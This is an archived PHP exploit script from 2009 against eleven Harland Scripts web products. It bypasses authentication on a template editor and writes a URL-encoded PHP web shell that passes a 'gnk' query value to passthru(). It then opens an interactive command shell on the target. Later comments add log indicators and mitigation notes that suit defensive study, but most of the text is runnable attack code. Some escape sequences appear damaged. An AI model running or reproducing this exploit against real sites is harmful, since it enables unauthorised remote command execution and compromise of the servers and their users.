# Title : Harland Scripts 11 Products Remote Command Execution Exploit
# Published : 2009-05-15
# Author : G4N0K
<?php
//786
/*
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | | | / _ | |/ /
| | _ | || |_ | | | | | | | | ' /
| |_| | |__ _| | | | | |_| | | .
____| |_| |_| _| ___/ |_|_...FROM IRAN
==============================================================================
Harland Scripts 11 Products Remote Command Execution Exploit
==============================================================================
[?a] Script:.............[ Harland Scripts 11 Products ]...............
[?a] Website:............[ http://harlandscripts.com(!) ]..............
[?a] Today:..............[ 1005009 ]..................................
[?a] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......
[+] What's going on
======================================
[0] Auth bypass...
[1] PHP-Code Injection...
[+] Vulnerable Scripts
======================================
1 - Traffic Click 4 Cash Script
2 - Get A Date Script
3 - Birthsake Keepsake
4 - FFA
5 - TShirt Rental Script
6 - Mug Rental script
7 - Top Hits
8 - Recipe 6.0
9 - Link Lister Traffic System
10 - Link Back Checker Service Script
11 - AD PHP Script
[+] SQLi & AFU
======================================
Some of these scripts are also vulnerable to "SQLi" and "Arbitrary File Upload(Auth bypass)"...
*/
// Turn off all PHP diagnostics for the rest of the run; notices and warnings raised
// further down (for example by the socket helper) are therefore never shown.
error_reporting(0);
// Stop immediately unless the interpreter was started from the command line.
if (php_sapi_name() <> "cli") {
die("WTF, Run Me From CommandLine...");
}
// $argc counts the script name, so exactly three user arguments are required;
// any other count prints the banner and the usage text and stops.
if ($argc <> 4){__nfo();__usg();exit;}
// Positional arguments, copied as given with no validation:
//   $hst - host name or address the requests are sent to
//   $pth - URL path prefix of the installation (the usage text shows "/FFA/")
//   $prd - product number 1-11, selecting the paths used later in the script
$hst = $argv[1];
$pth = $argv[2];
$prd = $argv[3];
/**
 * Print the fixed banner block identifying the script and its author.
 *
 * Takes no input and returns nothing; the text is written to standard output
 * exactly as stored, including the trailing "rn" line.
 */
function __nfo()
{
    // Nothing in the banner is interpolated, so a nowdoc emits the same bytes.
    echo <<<'EOL'
+-------------------------------------------------------------+
| Harland Scripts Multiple Products Command Execution Exploit |
| by: G4N0K | mail[o]ganok[ta]com |
| Thanks: ALLAH, MSD, SMN, AMD, AFN, Str0ke |
+-------------------------------------------------------------+
rn
EOL;
}
/**
 * Print the command-line usage text and the table of product numbers.
 *
 * The numbers 1-11 listed here are the values the main script compares
 * its third argument against. Nothing is returned.
 */
function __usg()
{
    // Kept as one literal so the output matches the stored text byte for byte.
    $usageText = <<<'GNK'
uasge...:
xpl.php [host] [path] [product-number]
xpl.php 127.0.0.1 /FFA/ 4
Product Numbers:
=========================================
1 - Traffic Click 4 Cash Script
2 - Get A Date Script
3 - Birthsake Keepsake
4 - FFA
5 - TShirt Rental Script
6 - Mug Rental script
7 - Top Hits
8 - Recipe 6.0
9 - Link Lister Traffic System
10 - Link Back Checker Service Script
11 - AD PHP Script
GNK;
    print $usageText;
}
/**
 * Write one pre-built request string to $hst on TCP port 80 and return
 * everything read back from the connection.
 *
 * The connection is plain TCP to port 80 (no TLS) with a 30-second connect
 * timeout. If the connection cannot be opened the function prints the socket
 * error and terminates the whole script instead of returning.
 *
 * @param string $hst Host handed to fsockopen().
 * @param string $pkt Request text written to the socket unchanged.
 * @return string|null Response lines concatenated in arrival order.
 */
function __snd($hst, $pkt)
{
$socket = fsockopen($hst, 80, $errno, $errstr, 30);
// NOTE(review): $ggg is initialised here but never read; the loop below
// accumulates into $g4n0k, which has no initial value.
$ggg='';
if (!$socket) {
echo "rn [+] Socket err#: $errstr ($errno)nr";exit;
} else {
fwrite($socket, $pkt);
// Read until the peer closes the connection, at most 2048 bytes per fgets() call.
while (!feof($socket)) {
$g4n0k.=fgets($socket, 2048);
}
fclose($socket);
return $g4n0k;
}
}
/**
 * Return the part of a response that lies between the first and the last
 * occurrence of the marker string "gnkgnkgnk".
 *
 * When neither lookup yields a truthy offset an error line is echoed, but the
 * substring is still computed and returned from whatever offsets resulted.
 *
 * @param string $wt Raw response text to search.
 * @return string Text found between the two marker positions.
 */
function __srch($wt)
{
    $marker = 'gnkgnkgnk';
    $firstAt = strpos($wt, $marker);
    $lastAt = strrpos($wt, $marker);

    // Same truthiness test as before, rearranged with De Morgan.
    if (!($firstAt || $lastAt)) {
        echo " [!] error...rn";
    }

    // 9 is the length of the marker; the slice starts right after the first one.
    $from = $firstAt + 9;
    $length = $lastAt - $from;

    return substr($wt, $from, $length);
}
// Main flow: (1) POST a "save" request to a product's template editor, (2) fetch the
// file that request named, (3) loop forwarding typed lines to that file as a query value.
//
// NOTE(review): the line-terminator sequences inside the string literals of this block
// ("rn", "nr") look damaged by text extraction; they are left exactly as archived.
//
// Default request body for the save step. URL-decoded it carries three form fields:
//   act   = save
//   fname = ../tpl/header.php   (a relative path containing "..")
//   art   = a short PHP snippet that prints the marker "gnkgnkgnk", hands
//           $_GET["gnk"] to passthru(), then prints the marker again
// Defender note: the field names act/fname/art, the query parameter "gnk", the file
// name gnk.php and the marker "gnkgnkgnk" are fixed strings in this listing and can be
// searched for in web-server access logs, WAF logs and on disk.
$joke = "act=save&fname=..%2Ftpl%2Fheader.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
__nfo();
// Per-product path table. $pth0 is the template-editor script that receives the POST;
// $pth1 is the file requested afterwards. Products 8-11 also replace $joke so that
// fname names a new file gnk.php instead of header.php.
// Defender note: with the default body the save request names header.php, an existing
// site template rather than a new file, so file-integrity monitoring of template
// directories is relevant as well as a search for unexpected new .php files.
if ($prd == 1 || $prd == 2 || $prd == 3 || $prd == 4)
{
$pth0 = "admin/template.php";
$pth1 = "tpl/header.php";
}
elseif ($prd == 5 || $prd == 6)
{
$pth0 = "admin/template.php";
$pth1 = "templates/header.php";
}
elseif ($prd == 7)
{
$pth0 = "admin/template.php";
$pth1 = "template/header.php";
} elseif ($prd == 8)
{
$pth0 = "admin2/template.php";
$pth1 = "admin2/gnk.php";
$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} elseif ($prd == 9)
{
$pth0 = "admin/template.php";
$pth1 = "admin/backup/gnk.php";
$joke = "act=save&fname=backup%2Fgnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} elseif ($prd == 10)
{
$pth0 = "admincontrol/template.php";
$pth1 = "admincontrol/gnk.php";
$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} elseif ($prd == 11)
{
$pth0 = "template.php";
$pth1 = "gnk.php";
$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} else
{
// Any other product number: show the usage text and stop.
__usg();
exit;
}
// Save request. The only headers set are Host, Keep-Alive, Connection, Content-Length
// and Content-Type; no Cookie or Authorization header is sent, which matches the
// "Auth bypass" item in the header comment: the editor is addressed without a session.
// Mitigation (review note): the template editor should reject unauthenticated requests,
// accept only file names from a fixed allowlist (no "..", no path separators), and the
// template/backup directories should not be both web-writable and PHP-executable.
$msd_pyld = "POST {$pth}{$pth0} HTTP/1.1rn";
$msd_pyld .= "Host: {$hst}rn";
$msd_pyld .= "Keep-Alive: 300nr";
$msd_pyld .= "Connection: keep-alivern";
$msd_pyld .= "Content-Length: ".strlen($joke)."rn";
$msd_pyld .= "Content-Type: application/x-www-form-urlencodedrnrn";
$msd_pyld .= $joke;
echo "rn [+] Trying to exploit {$hst}...";
// Follow-up request for the file named in the save step.
$amd_pyld = "GET {$pth}{$pth1} HTTP/1.1rn";
$amd_pyld .= "Host: {$hst}rn";
$amd_pyld .= "Connection: closenrnr";
// Success test: the save response must not contain "permission" (case-insensitive)
// and the follow-up response must contain "gnk". Both requests are sent here.
if (!stristr(__snd($hst, $msd_pyld), "permission") && stristr(__snd($hst, $amd_pyld), "gnk"))
{
echo "rn [+] PHP-Code has been injected...";
echo "rn [+] Now you can exec your commands...rn";} else {
echo "rn [+] Oops!, Code injection failed.rn"; exit;
}
// Interactive loop: each line read from STDIN is trimmed, has its spaces replaced by
// %20 (no other encoding is applied), and is sent as the "gnk" query value of a GET to
// $pth1; the text between the two markers in the response is printed. Typing "exit"
// ends the script.
// Defender note: in access logs this shows up as repeated GET requests to header.php
// or gnk.php carrying a gnk= query string, following a POST to template.php.
while(1)
{
echo "rnphp-shell@{$hst}# ";
if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit;
$smn_pyld = "GET {$pth}{$pth1}?gnk=".$cmd." HTTP/1.1rn";
$smn_pyld .= "Host: {$hst}rn";
$smn_pyld .= "Connection: closenrnr";
print __srch(__snd($hst, $smn_pyld));
}
?>